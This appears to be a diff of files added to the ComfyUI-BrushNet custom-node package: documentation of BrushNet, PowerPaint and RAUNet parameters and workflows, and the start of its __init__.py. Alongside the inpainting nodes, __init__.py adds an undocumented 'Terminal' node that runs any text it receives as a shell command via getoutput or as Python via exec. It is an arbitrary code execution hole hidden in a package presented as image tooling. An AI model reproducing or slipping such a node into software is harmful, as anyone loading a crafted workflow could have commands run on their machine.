The `end_at` parameter switches off BrushNet for the last steps. If you use a deterministic sampler, it will only influence details in the last steps, but stochastic samplers can change the whole scene. For a description of samplers see, for example, Matteo Spinelli's [video on ComfyUI basics](https://youtu.be/_C7kR2TFIX0?t=516).
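The interplay of `start_at`, `end_at` and the KSampler `steps` can be summarised with a small sketch. The exact boundary handling is an assumption here (a half-open window `start_at <= step < end_at` with zero-based steps); the helper names `brushnet_active` and `active_steps` are hypothetical and do not come from the node's code.

```python
def brushnet_active(step, start_at, end_at):
    """Assumed rule: BrushNet contributes on steps with start_at <= step < end_at."""
    return start_at <= step < end_at

def active_steps(total_steps, start_at, end_at):
    """List the zero-based sampler steps on which BrushNet would be applied."""
    return [s for s in range(total_steps) if brushnet_active(s, start_at, end_at)]

# 15 sampler steps, as in the examples in this document.
never = active_steps(15, start_at=20, end_at=10000)   # start_at beyond the last step
always = active_steps(15, start_at=0, end_at=10000)   # BrushNet on every step
window = active_steps(15, start_at=3, end_at=10)      # delayed start, early stop
```

Under this assumption, setting `start_at` above the number of sampler steps leaves BrushNet inactive for the whole run, which matches the "without BrushNet" experiment described earlier.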

|

| 32 |

+

|

| 33 |

+

Here I use the basic BrushNet inpaint [example](example/BrushNet_basic.json), with the "intricate teapot" prompt, the deterministic `dpmpp_2m` sampler and the `karras` scheduler with 15 steps:

|

| 34 |

+

|

| 35 |

+

|

| 36 |

+

|

| 37 |

+

There are almost no changes when we set the `end_at` parameter to 10, but from that point down the result starts to change:

|

| 38 |

+

|

| 39 |

+

| `end_at` = 10 | `end_at` = 9 | `end_at` = 8 |

|

| 40 |

+

|:--------------:|:--------------:|:--------------:|

|

| 41 |

+

|  |  |  |

|

| 42 |

+

| `end_at` = 7 | `end_at` = 6 | `end_at` = 5 |

|

| 43 |

+

|  |  |  |

|

| 44 |

+

| `end_at` = 4 | `end_at` = 3 | `end_at` = 2 |

|

| 45 |

+

|  |  |  |

|

| 46 |

+

|

| 47 |

+

You can see how the scene was completely redrawn.

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/RAUNET.md

ADDED

|

@@ -0,0 +1,39 @@

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|



| 1 |

+

While investigating compatibility issues with [WASasquatch's FreeU_Advanced](https://github.com/WASasquatch/FreeU_Advanced/tree/main) and [blepping's jank HiDiffusion](https://github.com/blepping/comfyui_jankhidiffusion) nodes, I ran into some quite hard problems. There are `FreeU` nodes in ComfyUI but no equivalent for HiDiffusion, so I decided to implement RAUNet on the basis of my BrushNet implementation. **blepping**, I am sorry. :)

|

| 2 |

+

|

| 3 |

+

### RAUNet

|

| 4 |

+

|

| 5 |

+

What is RAUNet? I know many of you have seen and generated images with a lot of limbs, fingers and faces all morphed together.

|

| 6 |

+

|

| 7 |

+

The authors of HiDiffusion invented a simple yet efficient trick to alleviate this problem. Here is an example:

|

| 8 |

+

|

| 9 |

+

|

| 10 |

+

|

| 11 |

+

[workflow](example/RAUNet_basic.json)

|

| 12 |

+

|

| 13 |

+

The left picture was created using the ZavyChromaXL checkpoint on a 2048x2048 canvas. The right one uses RAUNet.

|

| 14 |

+

|

| 15 |

+

In my experience the node is helpful but quite sensitive to its parameters, and there is no universal solution - you should adjust them for every new image you generate. It also lowers the model's imagination: you usually get only what you described in the prompt. Look at the example: in the first image there is a forest in the background, but RAUNet removed everything except the fox, which is what the prompt describes.

|

| 16 |

+

|

| 17 |

+

From the [paper](https://arxiv.org/abs/2311.17528): Diffusion models denoise from structures to details. RAU-Net introduces additional downsampling and upsampling operations, leading to a certain degree of information loss. In the early stages of denoising, RAU-Net can generate reasonable structures with minimal impact from information loss. However, in the later stages of denoising when generating fine details, the information loss in RAU-Net results in the loss of image details and a degradation in quality.

|

| 18 |

+

|

| 19 |

+

### Parameters

|

| 20 |

+

|

| 21 |

+

There are two independent parts in this node: DU (Downsample/Upsample) and XA (CrossAttention). The four parameters are the start and end steps for applying these parts.

|

| 22 |

+

|

| 23 |

+

The Downsample/Upsample part lowers the model's degrees of freedom. If you apply it a lot (for more steps), the resulting images will have a lot of symmetries.

|

| 24 |

+

|

| 25 |

+

The CrossAttention part lowers the number of objects which the model tracks in the image.

|

| 26 |

+

|

| 27 |

+

Usually you apply DU and, after several steps, apply XA. Sometimes you will need only XA. You should try it yourself.
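The start and end steps described above can be pictured as two step windows. The following is only a minimal sketch, not the node's actual code: the function name `active_parts` is hypothetical, the default values are the ones listed for the RAUNet node in the README, and the assumption that each window is half-open (`start <= step < end`) has not been checked against the implementation.

```python
def active_parts(step, du_start=0, du_end=4, xa_start=4, xa_end=10):
    """Return which RAUNet parts are assumed to be active at a sampling step.

    Assumption (hypothetical): each window is half-open, [start, end).
    """
    parts = []
    if du_start <= step < du_end:
        parts.append("DU")  # Downsample/Upsample part
    if xa_start <= step < xa_end:
        parts.append("XA")  # CrossAttention part
    return parts


# Which parts would run on each of the first 12 steps with the defaults.
schedule = {step: active_parts(step) for step in range(12)}
for step, parts in schedule.items():
    print(step, parts)
```

With these defaults DU covers the first steps and XA takes over afterwards, which matches the usual "DU first, then XA" pattern. Setting `du_start == du_end` in this sketch leaves only XA active.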

|

| 28 |

+

|

| 29 |

+

### Compatibility

|

| 30 |

+

|

| 31 |

+

It is compatible with BrushNet and most other nodes.

|

| 32 |

+

|

| 33 |

+

This is a ControlNet example. The lower image is from the pure model, the upper one is after using RAUNet. You can see a small fox and two tails in the lower image.

|

| 34 |

+

|

| 35 |

+

|

| 36 |

+

|

| 37 |

+

[workflow](example/RAUNet_with_CN.json)

|

| 38 |

+

|

| 39 |

+

The node can be implemented for any model. Right now it can be applied to SD15 and SDXL models.

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/README.md

ADDED

|

@@ -0,0 +1,262 @@

| 1 |

+

## ComfyUI-BrushNet

|

| 2 |

+

|

| 3 |

+

These are custom nodes for ComfyUI native implementation of

|

| 4 |

+

|

| 5 |

+

- BrushNet: [BrushNet: A Plug-and-Play Image Inpainting Model with Decomposed Dual-Branch Diffusion](https://arxiv.org/abs/2403.06976)

|

| 6 |

+

- PowerPaint: [A Task is Worth One Word: Learning with Task Prompts for High-Quality Versatile Image Inpainting](https://arxiv.org/abs/2312.03594)

|

| 7 |

+

- HiDiffusion: [HiDiffusion: Unlocking Higher-Resolution Creativity and Efficiency in Pretrained Diffusion Models](https://arxiv.org/abs/2311.17528)

|

| 8 |

+

|

| 9 |

+

My contribution is limited to the ComfyUI adaptation, and all credit goes to the authors of the papers.

|

| 10 |

+

|

| 11 |

+

## Updates

|

| 12 |

+

|

| 13 |

+

May 16, 2024. Internal rework to improve compatibility with other nodes. [RAUNet](RAUNET.md) is implemented.

|

| 14 |

+

|

| 15 |

+

May 12, 2024. CutForInpaint node, see [example](BIG_IMAGE.md).

|

| 16 |

+

|

| 17 |

+



May 11, 2024. Image batch is implemented. You can even add BrushNet to AnimateDiff vid2vid workflow, but they don't work together - they are different models and both try to patch UNet. Added some more examples.

|

| 18 |

+

|

| 19 |

+

May 6, 2024. PowerPaint v2 model is implemented. After the update your workflow probably will not work. Don't panic! Check the `end_at` parameter of the BrushNet node: if it equals 1, change it to some big number. Read about the parameters in the Usage section below.

|

| 20 |

+

|

| 21 |

+

May 2, 2024. BrushNet SDXL is live. It needs positive and negative conditioning though, so the workflow changes a little, see the example.

|

| 22 |

+

|

| 23 |

+

Apr 28, 2024. Another rework, sorry for the inconvenience. But now BrushNet is native to ComfyUI. cubiq's famous [IPAdapter Plus](https://github.com/cubiq/ComfyUI_IPAdapter_plus) is now working with BrushNet! I hope... :) Please report any bugs you find.

|

| 24 |

+

|

| 25 |

+

Apr 18, 2024. Complete rework, no more custom `diffusers` library. It is possible to use LoRA models.

|

| 26 |

+

|

| 27 |

+

Apr 11, 2024. Initial commit.

|

| 28 |

+

|

| 29 |

+

## Plans

|

| 30 |

+

|

| 31 |

+

- [x] BrushNet SDXL

|

| 32 |

+

- [x] PowerPaint v2

|

| 33 |

+

- [x] Image batch

|

| 34 |

+

|

| 35 |

+

## Installation

|

| 36 |

+

|

| 37 |

+

Clone the repo into the `custom_nodes` directory and install the requirements:

|

| 38 |

+

|

| 39 |

+

```
git clone https://github.com/nullquant/ComfyUI-BrushNet.git
pip install -r requirements.txt
```

|

| 43 |

+

|

| 44 |

+

Checkpoints of BrushNet can be downloaded from [here](https://drive.google.com/drive/folders/1fqmS1CEOvXCxNWFrsSYd_jHYXxrydh1n?usp=drive_link).

|

| 45 |

+

|

| 46 |

+

The `segmentation_mask_brushnet_ckpt` folder provides checkpoints trained on BrushData, which has a segmentation prior (masks have the same shape as the objects). The `random_mask_brushnet_ckpt` folder provides a more general checkpoint for random mask shapes.

|

| 47 |

+

|

| 48 |

+

`segmentation_mask_brushnet_ckpt` and `random_mask_brushnet_ckpt` contain BrushNet for SD 1.5 models, while `segmentation_mask_brushnet_ckpt_sdxl_v0` and `random_mask_brushnet_ckpt_sdxl_v0` are for SDXL.

|

| 50 |

+

|

| 51 |

+

You should place the `diffusion_pytorch_model.safetensors` files in your `models/inpaint` folder. You can also specify the `inpaint` folder in your `extra_model_paths.yaml`.

|

| 52 |

+

|

| 53 |

+

For PowerPaint you should download three files. Both `diffusion_pytorch_model.safetensors` and `pytorch_model.bin` from [here](https://huggingface.co/JunhaoZhuang/PowerPaint-v2-1/tree/main/PowerPaint_Brushnet) should be placed in your `models/inpaint` folder.

|

| 54 |

+

|

| 55 |

+

You also need the SD1.5 text encoder model `model.fp16.safetensors` from [here](https://huggingface.co/runwayml/stable-diffusion-v1-5/tree/main/text_encoder). It should be placed in your `models/clip` folder.

|

| 56 |

+

|

| 57 |

+

This is the structure of my `models/inpaint` folder:

|

| 58 |

+

|

| 59 |

+

|

| 60 |

+

|

| 61 |

+

Yours can be different.

|

| 62 |

+

|

| 63 |

+

## Usage

|

| 64 |

+

|

| 65 |

+

Below is an example for the intended workflow. The [workflow](example/BrushNet_basic.json) for the example can be found inside the 'example' directory.

|

| 66 |

+

|

| 67 |

+

|

| 68 |

+

|

| 69 |

+

<details>

|

| 70 |

+

<summary>SDXL</summary>

|

| 71 |

+

|

| 72 |

+

|

| 73 |

+

|

| 74 |

+

[workflow](example/BrushNet_SDXL_basic.json)

|

| 75 |

+

|

| 76 |

+

</details>

|

| 77 |

+

|

| 78 |

+

<details>

|

| 79 |

+

<summary>IPAdapter plus</summary>

|

| 80 |

+

|

| 81 |

+

|

| 82 |

+

|

| 83 |



+

[workflow](example/BrushNet_with_IPA.json)

|

| 84 |

+

|

| 85 |

+

</details>

|

| 86 |

+

|

| 87 |

+



<details>

|

| 88 |

+

<summary>LoRA</summary>

|

| 89 |

+

|

| 90 |

+

|

| 91 |

+

|

| 92 |

+

[workflow](example/BrushNet_with_LoRA.json)

|

| 93 |

+

|

| 94 |

+

</details>

|

| 95 |

+

|

| 96 |

+

<details>

|

| 97 |

+

<summary>Blending inpaint</summary>

|

| 98 |

+

|

| 99 |

+

|

| 100 |

+

|

| 101 |

+

Sometimes inference and the VAE break the image, so you need to blend the inpainted image with the original: [workflow](example/BrushNet_inpaint.json). You can see blurred and broken text after inpainting in the first image, and how I propose to repair it.
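The idea of blending can be sketched as a per-pixel linear mix. This is only an illustration under stated assumptions, not the BlendInpaint node's actual algorithm: the function names `blend_pixel` and `blend_image` are hypothetical, images are plain nested lists of floats, and the mask is assumed to be soft, with 0.0 meaning "keep the original" and 1.0 meaning "use the inpainted pixel".

```python
def blend_pixel(original, inpainted, mask):
    """Linear blend of one pixel value; mask is in the range 0.0..1.0."""
    return mask * inpainted + (1.0 - mask) * original


def blend_image(original, inpainted, mask):
    """Blend two same-sized single-channel images row by row."""
    return [
        [blend_pixel(o, i, m) for o, i, m in zip(orow, irow, mrow)]
        for orow, irow, mrow in zip(original, inpainted, mask)
    ]


original = [[0.2, 0.2], [0.2, 0.2]]
inpainted = [[0.8, 0.8], [0.8, 0.8]]
mask = [[0.0, 1.0], [0.5, 0.0]]  # soft mask: 0.5 mixes both images equally
blended = blend_image(original, inpainted, mask)
print(blended)
```

Pixels outside the mask come straight from the original, so text or fine detail that the VAE round trip damaged there is restored, while a soft mask edge avoids a visible seam.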

|

| 102 |

+

|

| 103 |

+

</details>

|

| 104 |

+

|

| 105 |

+

<details>

|

| 106 |

+

<summary>ControlNet</summary>

|

| 107 |

+

|

| 108 |

+

|

| 109 |

+

|

| 110 |

+

[workflow](example/BrushNet_with_CN.json)

|

| 111 |

+

|

| 112 |

+

[ControlNet canny edge](CN.md)

|

| 113 |

+

|

| 114 |

+

</details>

|

| 115 |

+

|

| 116 |

+

<details>

|

| 117 |

+

<summary>ELLA outpaint</summary>

|

| 118 |

+

|

| 119 |

+

|

| 120 |

+

|

| 121 |

+

[workflow](example/BrushNet_with_ELLA.json)

|

| 122 |

+

|

| 123 |

+

</details>

|

| 124 |

+

|

| 125 |

+

<details>

|

| 126 |

+

<summary>Upscale</summary>

|

| 127 |

+

|

| 128 |

+

|

| 129 |

+

|

| 130 |

+

[workflow](example/BrushNet_SDXL_upscale.json)

|

| 131 |

+

|

| 132 |

+

To upscale you should use the base model, not BrushNet. The same is true for conditioning. Latent upscaling between BrushNet and KSampler will not work or will give you weird results. These limitations are due to the structure of BrushNet and its influence on UNet calculations.

|

| 133 |

+

|

| 134 |

+

</details>

|

| 135 |

+

|

| 136 |

+

<details>

|

| 137 |

+

<summary>Image batch</summary>

|

| 138 |

+

|

| 139 |

+

|

| 140 |

+

|

| 141 |

+

[workflow](example/BrushNet_image_batch.json)

|

| 142 |

+

|

| 143 |

+

If you have OOM problems, you can use Evolved Sampling from [AnimateDiff-Evolved](https://github.com/Kosinkadink/ComfyUI-AnimateDiff-Evolved):

|

| 144 |

+

|

| 145 |

+

|

| 146 |

+

|

| 147 |

+

[workflow](example/BrushNet_image_big_batch.json)

|

| 148 |

+

|

| 149 |

+

In Context Options, set `context_length` to the number of images which can be loaded into VRAM. Images will be processed in chunks of this size.
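Processing in chunks can be pictured with the sketch below. It is a simplification under stated assumptions, not AnimateDiff-Evolved's code: the helper `chunks` is hypothetical, and it splits the batch into plain non-overlapping pieces, whereas the real context scheduling may overlap neighbouring windows.

```python
def chunks(items, context_length):
    """Yield consecutive, non-overlapping chunks of at most context_length items."""
    if context_length < 1:
        raise ValueError("context_length must be at least 1")
    for start in range(0, len(items), context_length):
        yield items[start:start + context_length]


# Ten images (represented by their indices) with room for four in VRAM.
batches = list(chunks(list(range(10)), 4))
print(batches)
```

The last chunk is simply shorter when the batch size is not a multiple of `context_length`.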

|

| 150 |

+

|

| 151 |

+

</details>

|

| 152 |

+

|

| 153 |

+

|

| 154 |

+

<details>

|

| 155 |

+

<summary>Big image inpaint</summary>

|

| 156 |

+

|

| 157 |

+

|

| 158 |

+

|

| 159 |

+

[workflow](example/BrushNet_cut_for_inpaint.json)

|

| 160 |

+

|

| 161 |

+

When you work with a big image and your inpaint mask is small, it is better to cut out part of the image, work with it and then blend it back. I created a node for such a workflow, see the example.
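The cut, work and blend back idea can be sketched as follows. This is not the CutForInpaint node's implementation: the helpers `mask_bbox`, `crop` and `paste`, the `padding` parameter, and the use of nested lists for a non-empty image and mask are all assumptions made for illustration.

```python
def mask_bbox(mask, padding=0):
    """Return (top, left, bottom, right) around the non-zero mask pixels.

    bottom and right are exclusive; the box is clamped to the image.
    Returns None when the mask is empty.
    """
    rows = [y for y, row in enumerate(mask) if any(row)]
    if not rows:
        return None
    height, width = len(mask), len(mask[0])
    cols = [x for x in range(width) if any(row[x] for row in mask)]
    top = max(rows[0] - padding, 0)
    left = max(cols[0] - padding, 0)
    bottom = min(rows[-1] + 1 + padding, height)
    right = min(cols[-1] + 1 + padding, width)
    return top, left, bottom, right


def crop(image, box):
    """Cut the boxed region out of the image."""
    top, left, bottom, right = box
    return [row[left:right] for row in image[top:bottom]]


def paste(image, patch, box):
    """Return a copy of the image with the patch written back at the box."""
    top, left, _, _ = box
    result = [list(row) for row in image]
    for dy, patch_row in enumerate(patch):
        result[top + dy][left:left + len(patch_row)] = patch_row
    return result


image = [[10 * y + x for x in range(5)] for y in range(5)]
mask = [[0] * 5 for _ in range(5)]
mask[2][3] = 1  # a single masked pixel at row 2, column 3

box = mask_bbox(mask, padding=1)
patch = crop(image, box)             # the small region that would be inpainted
restored = paste(image, patch, box)  # writing it back leaves the rest untouched
print(box, patch)
```

Only the small patch would go through inference, so the cost depends on the mask size rather than on the full image size.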

|

| 163 |

+

|

| 164 |

+

</details>

|

| 165 |

+

|

| 166 |

+

|

| 167 |

+

<details>

|

| 168 |

+

<summary>PowerPaint outpaint</summary>

|

| 169 |

+

|

| 170 |

+

|

| 171 |

+

|

| 172 |

+

[workflow](example/PowerPaint_outpaint.json)

|

| 173 |

+

|

| 174 |

+

</details>

|

| 175 |

+

|

| 176 |

+

<details>

|

| 177 |

+

<summary>PowerPaint object removal</summary>

|

| 178 |

+

|



| 179 |

+

|

| 180 |

+

|

| 181 |

+

[workflow](example/PowerPaint_object_removal.json)

|

| 182 |

+

|

| 183 |

+

It is often hard to completely remove the object, especially if it is at the front:

|

| 184 |

+

|

| 185 |

+

|

| 186 |

+

|

| 187 |

+

You should try adding the object description to the negative prompt and describing an empty scene, like here:

|

| 188 |

+

|

| 189 |

+

|

| 190 |

+

|

| 191 |

+

</details>

|

| 192 |

+

|

| 193 |

+

### Parameters

|

| 194 |

+

|

| 195 |

+

#### Brushnet Loader

|

| 196 |

+

|

| 197 |

+

- `dtype`, defaults to `torch.float16`. The torch.dtype of BrushNet. If you have an old GPU or an NVIDIA 16 series card, try switching to `torch.float32`.

|

| 198 |

+

|

| 199 |

+

#### Brushnet

|

| 200 |

+

|

| 201 |

+

- `scale`, defaults to 1.0: The "strength" of BrushNet. The outputs of the BrushNet are multiplied by `scale` before they are added to the residual in the original unet.

|

| 202 |

+

- `start_at`, defaults to 0: step at which the BrushNet starts applying.

|

| 203 |

+

- `end_at`, defaults to 10000: step at which the BrushNet stops applying.

|

| 204 |

+

|

| 205 |

+

[Here](PARAMS.md) are examples of using these last two parameters.
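The three parameters above can be read as "scale the BrushNet output and add it to the UNet residual, but only inside a step window". The sketch below shows that reading on plain lists of floats. The function name `apply_brushnet` is hypothetical, and the half-open window `start_at <= step < end_at` is an assumption that has not been checked against the node's code.

```python
def apply_brushnet(residual, brushnet_output, step,
                   scale=1.0, start_at=0, end_at=10000):
    """Add the scaled BrushNet output to the residual inside the step window.

    Assumption (hypothetical): the window is half-open, [start_at, end_at).
    """
    if not (start_at <= step < end_at):
        return list(residual)  # BrushNet is not applied on this step
    return [r + scale * b for r, b in zip(residual, brushnet_output)]


residual = [1.0, 2.0]
brushnet_output = [0.5, 0.5]

print(apply_brushnet(residual, brushnet_output, step=0))            # full strength
print(apply_brushnet(residual, brushnet_output, step=0, scale=0.5))  # half strength
print(apply_brushnet(residual, brushnet_output, step=5, end_at=3))   # window closed
```

In this reading, a small `end_at` lets BrushNet shape only the early steps, while the large default keeps it active for the whole sampling run.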

|

| 206 |

+

|

| 207 |

+

#### PowerPaint

|

| 208 |

+

|

| 209 |

+

- `CLIP`: PowerPaint CLIP that should be passed from PowerPaintCLIPLoader node.

|

| 210 |

+

- `fitting`: PowerPaint fitting degree.

|

| 211 |

+

- `function`: PowerPaint function, see its [page](https://github.com/open-mmlab/PowerPaint) for details.

|

| 212 |

+

- `save_memory`: If this option is set, the attention module splits the input tensor in slices to compute attention in several steps. This is useful for saving some memory in exchange for a decrease in speed. If you run out of VRAM or get `Error: total bytes of NDArray > 2**32` on Mac try to set this option to `max`.

|

| 213 |

+

|

| 214 |

+

When using certain network functions, the authors of PowerPaint recommend adding phrases to the prompt:

|

| 215 |

+

|

| 216 |

+

- object removal: `empty scene blur`

|

| 217 |

+

- context aware: `empty scene`

|

| 218 |

+

- outpainting: `empty scene`

|

| 219 |

+

|

| 220 |

+

Many ComfyUI users use custom text generation nodes, CLIP nodes and a lot of other conditioning. I don't want to break all of these nodes, so I didn't add prompt updating and instead rely on users. My own experiments also show that these additions to the prompt are not strictly necessary.

|

| 221 |

+

|

| 222 |

+

The latent image can come from the BrushNet node or not, but it should be the same size as the original image (divided by 8 in latent space).
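As a quick arithmetic check of the size rule above, the following sketch computes the expected latent height and width. The helper names are hypothetical, and floor division for sizes that are not multiples of 8 is an assumption.

```python
def latent_size(height, width, factor=8):
    """Return the (height, width) of the latent for a pixel-space image."""
    return height // factor, width // factor


def latent_matches_image(latent_hw, image_hw, factor=8):
    """Check that a latent's spatial size corresponds to the image size."""
    return tuple(latent_hw) == latent_size(*image_hw, factor=factor)


print(latent_size(1024, 768))
print(latent_matches_image((64, 64), (512, 512)))
print(latent_matches_image((64, 64), (1024, 1024)))
```

For example, a 1024x768 image corresponds to a 128x96 latent, so a 64x64 latent only fits a 512x512 image.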

|

| 223 |

+

|

| 224 |

+

Both the `positive` and `negative` conditioning in the BrushNet and PowerPaint nodes are used for internal calculations, but are then simply copied to the output.

|

| 225 |

+

|

| 226 |

+

Be advised, not all workflows and nodes will work with BrushNet due to its structure. Also, put model changes before BrushNet nodes, not after. If you need a model to work with the image after BrushNet inference, use the base one (see the Upscale example above).

|

| 227 |

+

|

| 228 |

+

#### RAUNet

|

| 229 |

+

|

| 230 |

+

- `du_start`, defaults to 0: step at which the Downsample/Upsample resize starts applying.

|

| 231 |

+

- `du_end`, defaults to 4: step at which the Downsample/Upsample resize stops applying.

|

| 232 |

+

- `xa_start`, defaults to 4: step at which the CrossAttention resize starts applying.

|

| 233 |

+

- `xa_end`, defaults to 10: step at which the CrossAttention resize stops applying.

|

| 234 |

+

|

| 235 |

+

For examples and an explanation, please look [here](RAUNET.md).

|

| 236 |

+

|

| 237 |

+

## Limitations

|

| 238 |

+

|

| 239 |

+

BrushNet has some limitations (from the [paper](https://arxiv.org/abs/2403.06976)):

|

| 240 |

+

|

| 241 |

+

- The quality and content generated by the model are heavily dependent on the chosen base model. The results can exhibit incoherence if, for example, the given image is a natural image while the base model primarily focuses on anime.
- Even with BrushNet, we still observe poor generation results in cases where the given mask has an unusually shaped or irregular form, or when the given text does not align well with the masked image.

|

| 245 |

+

|

| 246 |

+

## Notes

|

| 247 |

+

|

| 248 |

+

Unfortunately, due to the nature of the BrushNet code, some nodes are not compatible with these, since they try to patch the same ComfyUI functions.

|

| 249 |

+

|

| 250 |

+

List of known incompatible nodes:

|

| 251 |

+

|

| 252 |

+

- [WASasquatch's FreeU_Advanced](https://github.com/WASasquatch/FreeU_Advanced/tree/main)

|

| 253 |

+

- [blepping's jank HiDiffusion](https://github.com/blepping/comfyui_jankhidiffusion)

|

| 254 |

+

|

| 255 |

+

## Credits

|

| 256 |

+

|

| 257 |

+

The code is based on

|

| 258 |

+

|

| 259 |

+

- [BrushNet](https://github.com/TencentARC/BrushNet)

|

| 260 |

+

- [PowerPaint](https://github.com/zhuang2002/PowerPaint)

|

| 261 |

+

- [HiDiffusion](https://github.com/megvii-research/HiDiffusion)

|

| 262 |

+

- [diffusers](https://github.com/huggingface/diffusers)

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/__init__.py

ADDED

|

@@ -0,0 +1,62 @@

| 1 |

+

from .brushnet_nodes import BrushNetLoader, BrushNet, BlendInpaint, PowerPaintCLIPLoader, PowerPaint, CutForInpaint
from .raunet_nodes import RAUNet
import torch
from subprocess import getoutput

"""
@author: nullquant
@title: BrushNet
@nickname: BrushName nodes
@description: These are custom nodes for ComfyUI native implementation of BrushNet, PowerPaint and RAUNet models
"""

class Terminal:

    @classmethod
    def INPUT_TYPES(s):
        return { "required": {
                    "text": ("STRING", {"multiline": True})
                    }
                }

    CATEGORY = "utils"
    RETURN_TYPES = ("IMAGE", )
    RETURN_NAMES = ("image", )
    OUTPUT_NODE = True

    FUNCTION = "execute"

    def execute(self, text):
        if text[0] == '"' and text[-1] == '"':
            out = getoutput(f"{text[1:-1]}")
            print(out)
        else:
            exec(f"{text}")
        return (torch.zeros(1, 128, 128, 4), )

|

| 36 |

+

|

| 37 |

+

|

| 38 |

+

|

| 39 |

+

# A dictionary that contains all nodes you want to export with their names

|

| 40 |

+

# NOTE: names should be globally unique

|

| 41 |

+

NODE_CLASS_MAPPINGS = {

|

| 42 |

+

"BrushNetLoader": BrushNetLoader,

|

| 43 |

+

"BrushNet": BrushNet,

|

| 44 |

+

"BlendInpaint": BlendInpaint,

|

| 45 |

+

"PowerPaintCLIPLoader": PowerPaintCLIPLoader,

|

| 46 |

+

"PowerPaint": PowerPaint,

|

| 47 |

+